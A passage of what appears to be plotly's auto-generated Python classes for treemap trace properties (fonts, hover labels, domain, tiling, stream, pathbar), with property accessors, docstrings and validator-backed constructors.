an instance of plotly.graph_objs.treemap.Marker"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import marker as v_marker
# Initialize validators
# ---------------------
self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
self._validators["cauto"] = v_marker.CautoValidator()
self._validators["cmax"] = v_marker.CmaxValidator()
self._validators["cmid"] = v_marker.CmidValidator()
self._validators["cmin"] = v_marker.CminValidator()
self._validators["coloraxis"] = v_marker.ColoraxisValidator()
self._validators["colorbar"] = v_marker.ColorBarValidator()
self._validators["colors"] = v_marker.ColorsValidator()
self._validators["colorscale"] = v_marker.ColorscaleValidator()
self._validators["colorssrc"] = v_marker.ColorssrcValidator()
self._validators["depthfade"] = v_marker.DepthfadeValidator()
self._validators["line"] = v_marker.LineValidator()
self._validators["pad"] = v_marker.PadValidator()
self._validators["reversescale"] = v_marker.ReversescaleValidator()
self._validators["showscale"] = v_marker.ShowscaleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
_v = arg.pop("cauto", None)
self["cauto"] = cauto if cauto is not None else _v
_v = arg.pop("cmax", None)
self["cmax"] = cmax if cmax is not None else _v
_v = arg.pop("cmid", None)
self["cmid"] = cmid if cmid is not None else _v
_v = arg.pop("cmin", None)
self["cmin"] = cmin if cmin is not None else _v
_v = arg.pop("coloraxis", None)
self["coloraxis"] = coloraxis if coloraxis is not None else _v
_v = arg.pop("colorbar", None)
self["colorbar"] = colorbar if colorbar is not None else _v
_v = arg.pop("colors", None)
self["colors"] = colors if colors is not None else _v
_v = arg.pop("colorscale", None)
self["colorscale"] = colorscale if colorscale is not None else _v
_v = arg.pop("colorssrc", None)
self["colorssrc"] = colorssrc if colorssrc is not None else _v
_v = arg.pop("depthfade", None)
self["depthfade"] = depthfade if depthfade is not None else _v
_v = arg.pop("line", None)
self["line"] = line if line is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("reversescale", None)
self["reversescale"] = reversescale if reversescale is not None else _v
_v = arg.pop("showscale", None)
self["showscale"] = showscale if showscale is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
    """Font used for `textinfo` text drawn inside treemap sectors."""

    # ---- font styling properties -------------------------------------

    @property
    def color(self):
        """
        Text color.

        Accepts a hex string (e.g. '#ff0000'), an rgb/rgba, hsl/hsla or
        hsv/hsva string, a named CSS color, or a list/array of any of
        the above.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["color"]

    @color.setter
    def color(self, value):
        self["color"] = value

    @property
    def colorsrc(self):
        """
        Sets the source reference on plot.ly for color.

        The 'colorsrc' property must be specified as a string or as a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["colorsrc"]

    @colorsrc.setter
    def colorsrc(self, value):
        self["colorsrc"] = value

    @property
    def family(self):
        """
        HTML font family - the typeface applied by the web browser.
        Provide multiple comma-separated families to express preference
        order; a font is applied only when available on the rendering
        system. The plotly image service supports a fixed set
        including "Arial", "Balto", "Courier New", "Droid Sans",
        "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old Standard
        TT", "Open Sans", "Overpass", "PT Sans Narrow", "Raleway",
        "Times New Roman".

        The 'family' property is a non-empty string, or a tuple, list
        or one-dimensional numpy array of such strings.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["family"]

    @family.setter
    def family(self, value):
        self["family"] = value

    @property
    def familysrc(self):
        """
        Sets the source reference on plot.ly for family.

        The 'familysrc' property must be specified as a string or as a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["familysrc"]

    @familysrc.setter
    def familysrc(self, value):
        self["familysrc"] = value

    @property
    def size(self):
        """
        Font size.

        The 'size' property is an int or float in the interval
        [1, inf], or a tuple, list or one-dimensional numpy array of
        such numbers.

        Returns
        -------
        int|float|numpy.ndarray
        """
        return self["size"]

    @size.setter
    def size(self, value):
        self["size"] = value

    @property
    def sizesrc(self):
        """
        Sets the source reference on plot.ly for size.

        The 'sizesrc' property must be specified as a string or as a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["sizesrc"]

    @sizesrc.setter
    def sizesrc(self, value):
        self["sizesrc"] = value

    # ---- plotly plumbing ---------------------------------------------

    @property
    def _parent_path_str(self):
        # Dotted path of the parent object in the figure hierarchy.
        return "treemap"

    @property
    def _prop_descriptions(self):
        # NOTE: this exact text is consumed by generated help output;
        # it is reproduced verbatim from the schema-generated original.
        return """\
        color

        colorsrc
            Sets the source reference on plot.ly for color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",,
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for family .
        size

        sizesrc
            Sets the source reference on plot.ly for size .
        """

    def __init__(
        self,
        arg=None,
        color=None,
        colorsrc=None,
        family=None,
        familysrc=None,
        size=None,
        sizesrc=None,
        **kwargs
    ):
        """
        Construct a new Insidetextfont object

        Sets the font used for `textinfo` lying inside the sector.
        An explicit keyword value takes precedence over the
        corresponding entry found in ``arg``.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Insidetextfont
        color, colorsrc, family, familysrc, size, sizesrc
            See the matching property docstrings for details.

        Returns
        -------
        Insidetextfont
        """
        super(Insidetextfont, self).__init__("insidetextfont")

        # Normalize ``arg`` into a plain dict we can pop entries from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
            )

        # ``skip_invalid`` is a constructor-only flag, not a property.
        self._skip_invalid = kwargs.pop("skip_invalid", False)

        # Validators live in the generated plotly.validators tree.
        from plotly.validators.treemap import insidetextfont as v_insidetextfont

        # (property name, explicit constructor value, validator class)
        prop_table = (
            ("color", color, v_insidetextfont.ColorValidator),
            ("colorsrc", colorsrc, v_insidetextfont.ColorsrcValidator),
            ("family", family, v_insidetextfont.FamilyValidator),
            ("familysrc", familysrc, v_insidetextfont.FamilysrcValidator),
            ("size", size, v_insidetextfont.SizeValidator),
            ("sizesrc", sizesrc, v_insidetextfont.SizesrcValidator),
        )

        # Register every validator first (same order as the original).
        for name, _, validator_cls in prop_table:
            self._validators[name] = validator_cls()

        # Populate: an explicit keyword wins over the value in ``arg``.
        for name, explicit, _ in prop_table:
            popped = arg.pop(name, None)
            self[name] = explicit if explicit is not None else popped

        # Anything left over is forwarded as unknown kwargs.
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset the constructor-only flag.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
    """Styling options for the hover labels of a treemap trace."""

    # ---- hover-label styling properties ------------------------------

    @property
    def align(self):
        """
        Horizontal alignment of the text content within the hover label
        box. Only has an effect when the label text spans two or more
        lines.

        The 'align' property is one of ['left', 'right', 'auto'], or a
        tuple, list or one-dimensional numpy array of those values.

        Returns
        -------
        Any|numpy.ndarray
        """
        return self["align"]

    @align.setter
    def align(self, value):
        self["align"] = value

    @property
    def alignsrc(self):
        """
        Sets the source reference on plot.ly for align.

        The 'alignsrc' property must be specified as a string or as a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["alignsrc"]

    @alignsrc.setter
    def alignsrc(self, value):
        self["alignsrc"] = value

    @property
    def bgcolor(self):
        """
        Background color of the hover labels for this trace.

        Accepts a hex string (e.g. '#ff0000'), an rgb/rgba, hsl/hsla or
        hsv/hsva string, a named CSS color, or a list/array of any of
        the above.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["bgcolor"]

    @bgcolor.setter
    def bgcolor(self, value):
        self["bgcolor"] = value

    @property
    def bgcolorsrc(self):
        """
        Sets the source reference on plot.ly for bgcolor.

        The 'bgcolorsrc' property must be specified as a string or as a
        plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["bgcolorsrc"]

    @bgcolorsrc.setter
    def bgcolorsrc(self, value):
        self["bgcolorsrc"] = value

    @property
    def bordercolor(self):
        """
        Border color of the hover labels for this trace.

        Accepts a hex string (e.g. '#ff0000'), an rgb/rgba, hsl/hsla or
        hsv/hsva string, a named CSS color, or a list/array of any of
        the above.

        Returns
        -------
        str|numpy.ndarray
        """
        return self["bordercolor"]

    @bordercolor.setter
    def bordercolor(self, value):
        self["bordercolor"] = value

    @property
    def bordercolorsrc(self):
        """
        Sets the source reference on plot.ly for bordercolor.

        The 'bordercolorsrc' property must be specified as a string or
        as a plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["bordercolorsrc"]

    @bordercolorsrc.setter
    def bordercolorsrc(self, value):
        self["bordercolorsrc"] = value

    @property
    def font(self):
        """
        Font used in hover labels.

        The 'font' property may be an instance of
        plotly.graph_objs.treemap.hoverlabel.Font, or a dict of
        string/value properties (color, colorsrc, family, familysrc,
        size, sizesrc) that will be passed to the Font constructor.

        Returns
        -------
        plotly.graph_objs.treemap.hoverlabel.Font
        """
        return self["font"]

    @font.setter
    def font(self, value):
        self["font"] = value

    @property
    def namelength(self):
        """
        Default length (in number of characters) of the trace name in
        the hover labels for all traces. -1 shows the whole name
        regardless of length; 0-3 show the first 0-3 characters; an
        integer > 3 shows the whole name when it fits, otherwise
        truncates to `namelength - 3` characters and adds an ellipsis.

        The 'namelength' property is an int (or float cast to int) in
        the interval [-1, 9223372036854775807], or a tuple, list or
        one-dimensional numpy array of such values.

        Returns
        -------
        int|numpy.ndarray
        """
        return self["namelength"]

    @namelength.setter
    def namelength(self, value):
        self["namelength"] = value

    @property
    def namelengthsrc(self):
        """
        Sets the source reference on plot.ly for namelength.

        The 'namelengthsrc' property must be specified as a string or
        as a plotly.grid_objs.Column object.

        Returns
        -------
        str
        """
        return self["namelengthsrc"]

    @namelengthsrc.setter
    def namelengthsrc(self, value):
        self["namelengthsrc"] = value

    # ---- plotly plumbing ---------------------------------------------

    @property
    def _parent_path_str(self):
        # Dotted path of the parent object in the figure hierarchy.
        return "treemap"

    @property
    def _prop_descriptions(self):
        # NOTE: this exact text is consumed by generated help output;
        # it is reproduced verbatim from the schema-generated original.
        return """\
        align
            Sets the horizontal alignment of the text content
            within hover label box. Has an effect only if the hover
            label text spans more two or more lines
        alignsrc
            Sets the source reference on plot.ly for align .
        bgcolor
            Sets the background color of the hover labels for this
            trace
        bgcolorsrc
            Sets the source reference on plot.ly for bgcolor .
        bordercolor
            Sets the border color of the hover labels for this
            trace.
        bordercolorsrc
            Sets the source reference on plot.ly for bordercolor .
        font
            Sets the font used in hover labels.
        namelength
            Sets the default length (in number of characters) of
            the trace name in the hover labels for all traces. -1
            shows the whole name regardless of length. 0-3 shows
            the first 0-3 characters, and an integer >3 will show
            the whole name if it is less than that many characters,
            but if it is longer, will truncate to `namelength - 3`
            characters and add an ellipsis.
        namelengthsrc
            Sets the source reference on plot.ly for namelength .
        """

    def __init__(
        self,
        arg=None,
        align=None,
        alignsrc=None,
        bgcolor=None,
        bgcolorsrc=None,
        bordercolor=None,
        bordercolorsrc=None,
        font=None,
        namelength=None,
        namelengthsrc=None,
        **kwargs
    ):
        """
        Construct a new Hoverlabel object

        An explicit keyword value takes precedence over the
        corresponding entry found in ``arg``.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Hoverlabel
        align, alignsrc, bgcolor, bgcolorsrc, bordercolor,
        bordercolorsrc, font, namelength, namelengthsrc
            See the matching property docstrings for details.

        Returns
        -------
        Hoverlabel
        """
        super(Hoverlabel, self).__init__("hoverlabel")

        # Normalize ``arg`` into a plain dict we can pop entries from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
            )

        # ``skip_invalid`` is a constructor-only flag, not a property.
        self._skip_invalid = kwargs.pop("skip_invalid", False)

        # Validators live in the generated plotly.validators tree.
        from plotly.validators.treemap import hoverlabel as v_hoverlabel

        # (property name, explicit constructor value, validator class)
        prop_table = (
            ("align", align, v_hoverlabel.AlignValidator),
            ("alignsrc", alignsrc, v_hoverlabel.AlignsrcValidator),
            ("bgcolor", bgcolor, v_hoverlabel.BgcolorValidator),
            ("bgcolorsrc", bgcolorsrc, v_hoverlabel.BgcolorsrcValidator),
            ("bordercolor", bordercolor, v_hoverlabel.BordercolorValidator),
            ("bordercolorsrc", bordercolorsrc, v_hoverlabel.BordercolorsrcValidator),
            ("font", font, v_hoverlabel.FontValidator),
            ("namelength", namelength, v_hoverlabel.NamelengthValidator),
            ("namelengthsrc", namelengthsrc, v_hoverlabel.NamelengthsrcValidator),
        )

        # Register every validator first (same order as the original).
        for name, _, validator_cls in prop_table:
            self._validators[name] = validator_cls()

        # Populate: an explicit keyword wins over the value in ``arg``.
        for name, explicit, _ in prop_table:
            popped = arg.pop(name, None)
            self[name] = explicit if explicit is not None else popped

        # Anything left over is forwarded as unknown kwargs.
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset the constructor-only flag.
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
    """Placement of this treemap trace within the figure/layout grid."""

    # ---- grid / fractional placement properties ----------------------

    @property
    def column(self):
        """
        If there is a layout grid, use the domain for this column in
        the grid for this treemap trace.

        The 'column' property is an int (or float that will be cast to
        an int) in the interval [0, 9223372036854775807].

        Returns
        -------
        int
        """
        return self["column"]

    @column.setter
    def column(self, value):
        self["column"] = value

    @property
    def row(self):
        """
        If there is a layout grid, use the domain for this row in the
        grid for this treemap trace.

        The 'row' property is an int (or float that will be cast to an
        int) in the interval [0, 9223372036854775807].

        Returns
        -------
        int
        """
        return self["row"]

    @row.setter
    def row(self, value):
        self["row"] = value

    @property
    def x(self):
        """
        Horizontal domain of this treemap trace (in plot fraction).

        The 'x' property is an info array: a list or tuple of two
        numbers, each an int or float in the interval [0, 1].

        Returns
        -------
        list
        """
        return self["x"]

    @x.setter
    def x(self, value):
        self["x"] = value

    @property
    def y(self):
        """
        Vertical domain of this treemap trace (in plot fraction).

        The 'y' property is an info array: a list or tuple of two
        numbers, each an int or float in the interval [0, 1].

        Returns
        -------
        list
        """
        return self["y"]

    @y.setter
    def y(self, value):
        self["y"] = value

    # ---- plotly plumbing ---------------------------------------------

    @property
    def _parent_path_str(self):
        # Dotted path of the parent object in the figure hierarchy.
        return "treemap"

    @property
    def _prop_descriptions(self):
        # NOTE: this exact text is consumed by generated help output;
        # it is reproduced verbatim from the schema-generated original.
        return """\
        column
            If there is a layout grid, use the domain for this
            column in the grid for this treemap trace .
        row
            If there is a layout grid, use the domain for this row
            in the grid for this treemap trace .
        x
            Sets the horizontal domain of this treemap trace (in
            plot fraction).
        y
            Sets the vertical domain of this treemap trace (in plot
            fraction).
        """

    def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
        """
        Construct a new Domain object

        An explicit keyword value takes precedence over the
        corresponding entry found in ``arg``.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Domain
        column, row
            Grid cell (when a layout grid exists) whose domain this
            trace should use.
        x, y
            Horizontal / vertical domain of this trace in plot
            fraction, each a 2-element list of numbers in [0, 1].

        Returns
        -------
        Domain
        """
        super(Domain, self).__init__("domain")

        # Normalize ``arg`` into a plain dict we can pop entries from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
            )

        # ``skip_invalid`` is a constructor-only flag, not a property.
        self._skip_invalid = kwargs.pop("skip_invalid", False)

        # Validators live in the generated plotly.validators tree.
        from plotly.validators.treemap import domain as v_domain

        # (property name, explicit constructor value, validator class)
        prop_table = (
            ("column", column, v_domain.ColumnValidator),
            ("row", row, v_domain.RowValidator),
            ("x", x, v_domain.XValidator),
            ("y", y, v_domain.YValidator),
        )

        # Register every validator first (same order as the original).
        for name, _, validator_cls in prop_table:
            self._validators[name] = validator_cls()

        # Populate: an explicit keyword wins over the value in ``arg``.
        for name, explicit, _ in prop_table:
            popped = arg.pop(name, None)
            self[name] = explicit if explicit is not None else popped

        # Anything left over is forwarded as unknown kwargs.
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset the constructor-only flag.
        self._skip_invalid = False
# Public names re-exported by this generated module (classes first, then
# the nested subpackages).
__all__ = [
    "Domain",
    "Hoverlabel",
    "Insidetextfont",
    "Marker",
    "Outsidetextfont",
    "Pathbar",
    "Stream",
    "Textfont",
    "Tiling",
    "hoverlabel",
    "marker",
    "pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
| 35.408599
| 87
| 0.556737
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
    """Treemap tiling options: d3 solver choice, axis flipping, inner
    padding and the "squarify" aspect ratio."""
    @property
    def flip(self):
        """Determines if the positions obtained from solver are flipped
        on each axis."""
        return self["flip"]
    @flip.setter
    def flip(self, val):
        self["flip"] = val
    @property
    def packing(self):
        """Determines the d3 treemap solver (see
        https://github.com/d3/d3-hierarchy#treemap-tiling)."""
        return self["packing"]
    @packing.setter
    def packing(self, val):
        self["packing"] = val
    @property
    def pad(self):
        """Sets the inner padding (in px)."""
        return self["pad"]
    @pad.setter
    def pad(self, val):
        self["pad"] = val
    @property
    def squarifyratio(self):
        """Desired aspect ratio (>= 1) of rectangles generated by the
        "squarify" `packing` algorithm."""
        return self["squarifyratio"]
    @squarifyratio.setter
    def squarifyratio(self, val):
        self["squarifyratio"] = val
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        return """\
        flip
            Determines if the positions obtained from solver are
            flipped on each axis.
        packing
            Determines d3 treemap solver. For more info please
            refer to https://github.com/d3/d3-hierarchy#treemap-
            tiling
        pad
            Sets the inner padding (in px).
        squarifyratio
            When using "squarify" `packing` algorithm, according to
            https://github.com/d3/d3-hierarchy/blob/master/README.m
            d#squarify_ratio this option specifies the desired
            aspect ratio of the generated rectangles. The ratio
            must be specified as a number greater than or equal to
            one. Note that the orientation of the generated
            rectangles (tall or wide) is not implied by the ratio;
            for example, a ratio of two will attempt to produce a
            mixture of rectangles whose width:height ratio is
            either 2:1 or 1:2. When using "squarify", unlike d3
            which uses the Golden Ratio i.e. 1.618034, Plotly
            applies 1 to increase squares in treemap layouts.
        """
    def __init__(
        self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
    ):
        """
        Construct a new Tiling object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Tiling
        flip
            Axes on which solver positions are flipped.
        packing
            d3 treemap solver.
        pad
            Inner padding (in px).
        squarifyratio
            Desired aspect ratio for the "squarify" algorithm.
        Returns
        -------
        Tiling
        """
        super(Tiling, self).__init__("tiling")
        # Normalize `arg` into a private dict copy.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
            )
        # Honor the private skip_invalid flag before assignments happen.
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        from plotly.validators.treemap import tiling as v_tiling
        # Register one validator per property.
        self._validators["flip"] = v_tiling.FlipValidator()
        self._validators["packing"] = v_tiling.PackingValidator()
        self._validators["pad"] = v_tiling.PadValidator()
        self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("flip", None)
        self["flip"] = flip if flip is not None else _v
        _v = arg.pop("packing", None)
        self["packing"] = packing if packing is not None else _v
        _v = arg.pop("pad", None)
        self["pad"] = pad if pad is not None else _v
        _v = arg.pop("squarifyratio", None)
        self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
        self._process_kwargs(**dict(arg, **kwargs))
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
    """Font settings for text inside treemap sectors (color, family,
    size, plus their plot.ly source references)."""
    @property
    def color(self):
        """Text color (or array of colors via `colorsrc`)."""
        return self["color"]
    @color.setter
    def color(self, val):
        self["color"] = val
    @property
    def colorsrc(self):
        """Source reference on plot.ly for color."""
        return self["colorsrc"]
    @colorsrc.setter
    def colorsrc(self, val):
        self["colorsrc"] = val
    @property
    def family(self):
        """HTML font family applied by the web browser."""
        return self["family"]
    @family.setter
    def family(self, val):
        self["family"] = val
    @property
    def familysrc(self):
        """Source reference on plot.ly for family."""
        return self["familysrc"]
    @familysrc.setter
    def familysrc(self, val):
        self["familysrc"] = val
    @property
    def size(self):
        """Font size."""
        return self["size"]
    @size.setter
    def size(self, val):
        self["size"] = val
    @property
    def sizesrc(self):
        """Source reference on plot.ly for size."""
        return self["sizesrc"]
    @sizesrc.setter
    def sizesrc(self, val):
        self["sizesrc"] = val
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        # Fixed: stray double comma after "Droid Sans" in the generated text.
        return """\
        color
        colorsrc
            Sets the source reference on plot.ly for color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for family .
        size
        sizesrc
            Sets the source reference on plot.ly for size .
        """
    def __init__(
        self,
        arg=None,
        color=None,
        colorsrc=None,
        family=None,
        familysrc=None,
        size=None,
        sizesrc=None,
        **kwargs
    ):
        """
        Construct a new Textfont object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Textfont
        color
        colorsrc
            Source reference on plot.ly for color.
        family
            HTML font family.
        familysrc
            Source reference on plot.ly for family.
        size
        sizesrc
            Source reference on plot.ly for size.
        Returns
        -------
        Textfont
        """
        super(Textfont, self).__init__("textfont")
        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
            )
        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import textfont as v_textfont
        # Initialize validators
        # ---------------------
        self._validators["color"] = v_textfont.ColorValidator()
        self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
        self._validators["family"] = v_textfont.FamilyValidator()
        self._validators["familysrc"] = v_textfont.FamilysrcValidator()
        self._validators["size"] = v_textfont.SizeValidator()
        self._validators["sizesrc"] = v_textfont.SizesrcValidator()
        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("color", None)
        self["color"] = color if color is not None else _v
        _v = arg.pop("colorsrc", None)
        self["colorsrc"] = colorsrc if colorsrc is not None else _v
        _v = arg.pop("family", None)
        self["family"] = family if family is not None else _v
        _v = arg.pop("familysrc", None)
        self["familysrc"] = familysrc if familysrc is not None else _v
        _v = arg.pop("size", None)
        self["size"] = size if size is not None else _v
        _v = arg.pop("sizesrc", None)
        self["sizesrc"] = sizesrc if sizesrc is not None else _v
        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
    """Streaming configuration (plot.ly streaming API) for a treemap trace."""

    @property
    def maxpoints(self):
        """Maximum number of points kept on the plot from an incoming
        stream (e.g. 50 displays only the newest 50 points)."""
        return self["maxpoints"]

    @maxpoints.setter
    def maxpoints(self, val):
        self["maxpoints"] = val

    @property
    def token(self):
        """Stream id number that links this data trace with a stream;
        see https://plot.ly/settings for details."""
        return self["token"]

    @token.setter
    def token(self, val):
        self["token"] = val

    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"

    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        return """\
        maxpoints
            Sets the maximum number of points to keep on the plots
            from an incoming stream. If `maxpoints` is set to 50,
            only the newest 50 points will be displayed on the
            plot.
        token
            The stream id number links a data trace on a plot with
            a stream. See https://plot.ly/settings for more
            details.
        """

    def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
        """
        Construct a new Stream object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Stream
        maxpoints
            Maximum number of points kept from an incoming stream.
        token
            Stream id number linking this trace with a stream.
        Returns
        -------
        Stream
        """
        super(Stream, self).__init__("stream")
        # Normalize `arg` into a private dict so that pop() below is safe.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
            )
        # Honor the private skip_invalid flag before assignments happen.
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        from plotly.validators.treemap import stream as v_stream
        # Register one validator per property.
        self._validators["maxpoints"] = v_stream.MaxpointsValidator()
        self._validators["token"] = v_stream.TokenValidator()
        # Explicit keyword arguments take precedence over entries in `arg`.
        for _name, _value in (("maxpoints", maxpoints), ("token", token)):
            _fallback = arg.pop(_name, None)
            self[_name] = _value if _value is not None else _fallback
        self._process_kwargs(**dict(arg, **kwargs))
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
    """Pathbar options for a treemap trace: the bar showing the current
    path, drawn outside the trace `domain`."""
    # edgeshape
    # ---------
    @property
    def edgeshape(self):
        """Shape used for edges between `barpath` labels."""
        return self["edgeshape"]
    @edgeshape.setter
    def edgeshape(self, val):
        self["edgeshape"] = val
    # side
    # ----
    @property
    def side(self):
        """Side of the treemap on which the `pathbar` is presented."""
        return self["side"]
    @side.setter
    def side(self, val):
        self["side"] = val
    # textfont
    # --------
    @property
    def textfont(self):
        """Font used inside `pathbar`."""
        return self["textfont"]
    @textfont.setter
    def textfont(self, val):
        self["textfont"] = val
    # thickness
    # ---------
    @property
    def thickness(self):
        """Thickness of `pathbar` in px; if unset, derived from
        `pathbar.textfont.size` plus padding."""
        return self["thickness"]
    @thickness.setter
    def thickness(self, val):
        self["thickness"] = val
    # visible
    # -------
    @property
    def visible(self):
        """Whether the path bar is drawn."""
        return self["visible"]
    @visible.setter
    def visible(self, val):
        self["visible"] = val
    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        # NOTE(review): "the the" and "pixles" below are typos in the
        # upstream generated text; the fix belongs in the code generator.
        return """\
        edgeshape
            Determines which shape is used for edges between
            `barpath` labels.
        side
            Determines on which side of the the treemap the
            `pathbar` should be presented.
        textfont
            Sets the font used inside `pathbar`.
        thickness
            Sets the thickness of `pathbar` (in px). If not
            specified the `pathbar.textfont.size` is used with 3
            pixles extra padding on each side.
        visible
            Determines if the path bar is drawn i.e. outside the
            trace `domain` and with one pixel gap.
        """
    def __init__(
        self,
        arg=None,
        edgeshape=None,
        side=None,
        textfont=None,
        thickness=None,
        visible=None,
        **kwargs
    ):
        """
